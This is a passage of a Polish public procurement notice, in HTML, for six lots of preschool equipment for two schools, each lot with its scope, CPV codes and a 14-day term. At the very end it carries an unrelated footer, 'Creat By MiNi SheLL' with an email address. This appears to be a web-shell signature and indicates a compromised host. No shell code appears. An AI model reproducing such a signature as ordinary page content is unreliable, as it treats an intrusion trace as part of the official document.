<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 8.1.Przedmiot zamówienia obejmuje zakup wraz z dostawą i montażem urządzeń na plac zabaw  dla dzieci  w  4  oddziałach  przedszkolnych 2 szkół podstawowych.
8.2.Rodzaj oraz ilość sprzętu wraz z wymaganymi minimalnymi parametrami zawarte są
we wzorze załącznika nr 6.1. do oferty (Rozdział 16 SIWZ). Wykonawca
zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach dla poszczególnych
szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKUP I DOSTAWA WYPOSAŻENIA TOALET.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia obejmuje  zakup  wraz  z  dostawą elementów wyposażenia toalet.
Wymagane minimalne parametry oraz ilości poszczególnego asortymentu
opisane są we wzorze załącznika nr 6.2. do oferty (Rozdział 16 SIWZ). Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach dla
poszczególnych szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.00.00-7, 38.62.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZAKUP I DOSTAWA WYPOSAŻENIA DO KUCHNI I SPRZĘTU
DO UTRZYMANIA CZYSTOŚCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup wraz z dostawą sprzętu do sprzątania typu
froterka, odkurzacz oraz wyposażenia kuchni: sztućce, talerze, garnki, noże, 
pojemniki na żywność pojemniki do segregowania odpadów .
Rodzaj oraz ilości sprzętu i wyposażenia wraz z wymaganymi minimalnymi
parametrami zawarte są we wzorze załącznika nr 6.3. do oferty (Rozdział 16
SIWZ). Wykonawca zobowiązany jest dostarczyć meble i wyposażenie 
w pogrupowanych pakietach dla poszczególnych szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.00.00-7, 39.71.34.30-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZAKUP  I  DOSTAWA  POMOCY DYDAKTYCZNYCH,
 ZABAWEK I MATERIAŁÓW PLASTYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup wraz z dostawą pomocy dydaktycznych:
 gry różnego rodzaju, układanki, plansze, figury przestrzenne, zestawy do liczenia
 itp., zabawek: zestawy tematyczne, lalki, domki dla lalek, ubranka,, koparki,
 betoniarki, auta itp. oraz materiałów plastycznych: papiery, bibuły, pióra, oczka,
 pompony, farby, kleje, mazaki.
 Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami 
zawarte są we wzorze załącznika nr 6.4 do oferty (Rozdział 16 SIWZ). Wykonawca 
zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.80.00.00-6, 44.81.20.00-0, 37.52.00.00-9, 30.19.00.00-7, 33.14.16.23-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZAKUP I DOSTAWA MEBLI DO SAL DYDAKTYCZNYCH,    
 SZATNI I WYPOSAŻENIA WYPOCZYNKOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup wraz z dostawą mebli do sal
dydaktycznych, szatni: regały, biurka, krzesła, stoliki przedszkolne, ławeczki 
szatniowe oraz różnego rodzaju wyposażenia wypoczynkowego: puf, materacy, 
poduch, siedzisk itd.

Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami 
zawarte są we wzorze załącznika nr 6.5 do oferty (Rozdział 16 SIWZ). Wykonawca 
zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.16.10.00-8, 39.15.00.00-8, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZAKUP I DOSTAWA SPRZĘTU KOMPUTEROWEGO I   
AUDIOWIZUALNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup wraz z dostawą zestawu interaktywnego,  
ekranu projekcyjnego, rzutnika przenośnego, telewizora, radiomagnetofonu.
      Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są we wzorze załącznika nr 6.6 do oferty (Rozdział 16 SIWZ). Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.13.10-0, 22.47.00.00-5, 32.00.00.00-3, 32.32.00.00-2, 32.32.00.00-6, 48.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com